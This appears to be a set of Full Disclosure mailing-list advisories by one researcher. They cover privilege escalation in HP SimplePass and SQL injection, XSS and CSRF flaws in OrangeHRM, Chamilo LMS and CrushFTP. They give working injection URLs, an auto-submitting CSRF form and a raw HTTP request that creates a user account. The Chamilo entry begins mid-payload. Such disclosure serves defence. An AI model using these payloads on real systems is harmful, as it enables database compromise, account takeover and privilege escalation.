[FD] HP SimplePass Local Privilege Escalation

2017-05-22 Thread Rehan Ahmed

# Vulnerability Title: HP SimplePass Local Privilege Escalation
# Advisory Release Date: 05/18/2017
# Credit: Discovered By Rehan Ahmed
# Contact: knight_re...@hotmail.com
# Severity Level: Medium
# Type: Local
# Tested Platform: Windows 8 & 10 x64
# Vendor: HP Inc.
# Vendor Site: http://www.hp.com
# Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe
# Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 
# Vendor Contacted: 04/03/2017
# Vendor Response: 5/18/2017


Summary:

HP SimplePass allows you to safely store logon information for your favorite 
websites, and use a single method of authentication for your password-protected 
website accounts. Choose a fingerprint, password or PIN to authenticate your 
identity. Your computer must have at least one password-protected Windows User 
Account to use HP SimplePass.

https://support.hp.com/us-en/document/c03653209

#
Issue Details:
#

HP SimplePass is prone to a local privilege-escalation vulnerability due to 
insecure file system permissions that have been granted during installation. 
Local adversary can exploit this issue to gain elevated privileges on affected 
system.
HP SimplePass installs by default to "C:\Program 
Files\Hewlett-Packard\SimplePass" with very weak folder permissions granting 
any user full permission to the contents of the directory and it's subfolders. 
This allows ample opportunity for code execution against any other user running 
the application. HP SimplePass has few binaries which are typically configured 
as a service or startup program which makes this particularly easy to take 
leverage.
 
##
 
Proof of Concept
##
a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass"

C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
    Everyone:(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT 
AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    NT AUTHORITY\Authenticated 
Users:(I)(M)
    NT AUTHORITY\Authenticated 
Users:(I)(OI)(CI)(IO)(M)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
  

b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" 
| findstr /i "HP SimplePass"

HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program 
Files\Hewlett-Packard\SimplePass\cachesrvr.exe"   Auto
HP SimplePass Service    omniserv   C:\Program 
Files\Hewlett-Packard\SimplePass\OmniServ.exe Auto

A user can place a malicious DLL/EXE (e.g OmniServ.exe) file with one of the 
expected names into that directory and wait until the service is restarted. The 
service can not be restarted by normal users but an attacker could just reboot 
the system or wait for the next reboot to happen.

###
3) Mitigation:
###
 

Change the permission for dirctory to group other than Administrator on 
Read/Execute.
Fix: 
https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] OrangeHRM Blind SQL Injection XSS Vulnerabilities

2015-04-11 Thread Rehan Ahmed
I. Overview 
 
OrangeHRM (Opensource 3.2.1, Professional  Enterprise 4.11) are prone to a 
multiple Blind SQL injection  XSS vulnerabilities. These vulnerabilities 
allows an attacker to inject SQL commands to compromise the affected database 
management system in HRM, perform operations on behalf of affected victim, 
redirect them to malicious sites, steal their credentials, and more. 

II. Severity 
 
Rating: High 
Remote: Yes 
Authentication Require: Yes 
CVE-ID: 

III. Vendor's Description of Application 
 

OrangeHRM Solutions

Effective HR tools and options to suit your needs Start-up, SME, global 
enterprises, whichever one you may be, OrangeHRM offers you flexibility and 
freedom to select from free and paid versions of OrangeHRM backed with 
specialized expertise. Our HR modules cover many major human capital management 
extents. OrangeHRM is used by millions of users around the world in all 
industries. Explore our solutions and contact our consultants to assist you 
with your selection process.

http://www.orangehrm.com/


IV. Vulnerability Details  Exploit 
 
1) Blind SQL Injection 


Request Method = GET

a) 
/symfony/web/index.php/leave/getFilteredEmployeeCountAjax?location=-1)+or+(31337=31337)+and+(20=20subunit=0

Request Method = POST

b) /symfony/web/index.php/recruitment/viewCandidates
   sortField=[BSQLi]

__ 

2) Multiple Reflected XSS 

Request Method = GET 

a) /symfony/web/index.php/admin/saveJobTitle?jobTitleId=1';+confirm(0);+// 

Request Method = POST

b) /symfony/web/index.php/performance/saveReview  
  saveReview360Form[reviewId] = [XSS Payload]  
  saveReview = [XSS Payload] 


VI. Affected Systems 
 
Software: OrangeHRM 
Version:  OrangeHRM Opensource 3.2.1 or prior
   OrangeHRM Professional  Enterprise 4.11 or prior
Solution (Fix): No

VII. Vendor Response/Solution 
 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Shared Technical Details/Poc : 02/13/2015
Again Vendor Contacted : 03/04/2015
Vendor Response: No Response
Advisory Release : 04/10/2015

VIII.Credits 
 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Chamilo LMS 1.9.10 Multiple XSS CSRF Vulnerabilities

2015-03-18 Thread Rehan Ahmed
/admin/session_add.php;
method=POST
input type=hidden name=formSent value=1 /
input type=hidden name=name
value=Testlt;scriptgt;confirm#40;0#41;lt;#47;scriptgt; /
input type=hidden name=coach#95;username value=admin /
input type=hidden name=session#95;category value=0 /
input type=hidden name=nb#95;days#95;acess#95;before
value=0 /
input type=hidden name=nb#95;days#95;acess#95;after
value=0 /
input type=hidden name=start#95;limit value=on /
input type=hidden name=day#95;start value=2 /
input type=hidden name=month#95;start value=3 /
input type=hidden name=year#95;start value=2015 /
input type=hidden name=end#95;limit value=on /
input type=hidden name=day#95;end value=2 /
input type=hidden name=month#95;end value=3 /
input type=hidden name=year#95;end value=2016 /
input type=hidden name=session#95;visibility value=1 /
input type=submit value=Submit request /
/form
/body
/html


VI. Affected Systems 
 
Software: Chamilo LMS 
Version: 1.9.10 and Prior
Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)

VII. Vendor Response/Solution 
 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Patch Release: 03/17/2015 
Advisory Release: 03/18/2015

VIII.Credits 
 
Discovered by Rehan Ahmed 
knight_re...@hotmail.com  

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Crushftp 7.2.0 - Multiple CSRF XSS Vulnerabilities

2015-02-18 Thread Rehan Ahmed

 I. Overview
 
 Multiple CSRF  Cross-Site Scripting (XSS) vulnerabilities have been 
identified in
Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities 
allows
 an attacker to gain control over valid user accounts, perform operations
 on their behalf, redirect them to malicious sites, steal their credentials,
 and more.
 
 II. Severity
 
 Rating: Medium
 Remote: Yes
 Authentication Require: Yes
 
 III. Vendor's Description of Application
 
CrushFTP is a robust file transfer server that makes it easy to setup secure 
connections with your users.
'Crush' comes from the built-in zip methods in CrushFTP. They allow for 
downloading files in compressed formats in-stream, 
or even automatically expanding zip files as they are received in-stream. This 
is called ZipStreaming and can greatly accelerate 
the transfer of many types of files.
Secure management is web based allowing you the ability to manage and monitor 
the server from anywhere, or with almost any device. 
Easy in place server upgrades without complicated installers. Runs as a daemon, 
or Windows service with no need for a local GUI.
CrushFTP is watching out for you by detecting common hack attempts and robots 
which scan for weak passwords. It will automatically 
protect you against DDoS attacks. No need for you to do anything as CrushFTP 
will automatically ban these IPs to prevent wasted logging and CPU usage. 
This keeps your server secure from unwanted abuse.
User management includes inheritance, groups, and virtual file systems. If you 
want simple user management, 
it can be as easy as just making a folder with a specific name and nothing 
else. 
Think about how easily you can delegate user administration with CrushFTP's 
role based administration and event configuration. 
http://www.crushftp.com/index.html

 
 IV. Vulnerability Details  Exploit
 

 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) 

 a) An attacker may add/delete/modify user's accounts 
 b) May change all configuration settings 

Request Method: POST
Location: /WebInterface/fuction/

Proof of Concept:- 



 
 
 
 
 
 
 
 
 
 
 
 
 


2) Multiple Cross-Site Scripting (Web Interface - Default Config)

Type: Reflected
Request Method: POST 
Location: /WebInterface/function/ 
Parameter: vfs_items
Values:  
vfs_items =  


Proof of Concept:

POST /WebInterface/function/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html
Content-Length: 656
Cookie: X
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

command=setUserItemdata_action=newserverGroup=MainUsersusername=testuser=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3ExmlItem=uservfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3Epermissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E


Type: Reflected
Request Method: GET 
Location: /WebInterface/function/ 
Parameter: path
Values:   

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/